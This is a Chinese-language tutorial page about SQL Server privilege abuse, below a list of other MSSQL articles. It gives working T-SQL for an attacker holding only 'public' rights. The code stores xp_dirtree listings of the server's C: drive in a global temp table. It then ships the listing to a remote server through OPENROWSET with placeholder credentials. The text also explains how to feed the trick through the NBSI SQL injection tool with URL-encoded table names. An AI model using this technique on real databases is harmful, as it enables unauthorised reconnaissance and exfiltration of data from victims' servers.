当前位置: 首页 > 图文教程 > 数据库 > MSSQL > Public权限下的列目录

MSSQL
将代码页从SQL Server 7.0改变到SQL Server 2000
浅析SQL SERVER一个没有公开的存储过程
使用存储过程时一个错误的解决方法
执行一个安全的SQL Server安装
SQL导出到MYSQL的简单方法
SQL Server 7六种数据移动方法
数据库升迁从sqlserver6.5到sqlserver2000
用SQL 2000创建用户化XML流
解决SQL Server 2000之日志传送功能
保持多台服务器数据的一致性
将ACCESS转化成SQL2000需要注意的几个问题
一次特殊的SQL Server安装奇遇
实现上千万条数据的分页显示
使用用于SQL Server的IIS虚拟目录管理实用工具
SQL Server连接ACCESS数据库的实现
使用SQL Server数据转换服务升迁Access数据库
SQLServer和Access、Excel数据传输简单总结
XML文件导入SQL Server 2000
在视图中使用ORDER BY子句
内嵌或嵌入SQL和存储过程之对比

MSSQL 中的 Public权限下的列目录


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-30   浏览: 544 ::
收藏到网摘: n/a

  提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的,使这些存储过程能利用上,071088b104HaKX8E看下面的代码吧
  --建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
  #-----为本地临时表
  ##----为全局临时表
  create table ##nonamed(
  dir ntext,
  num int
  )
  --调用存储过程把执行回来的数据存到临时表里面
  insert ##nonamed execute master..xp_dirtree 'c:\',1
  --然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
  insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
  select * from ##nonamed
  以上方法,也就是说public可以遍历用户服务器的目录
  在NBSI中,只要把临时表名加前加##就可以了,但要注意URL转码,即写成:%23%23nonamed就OK了!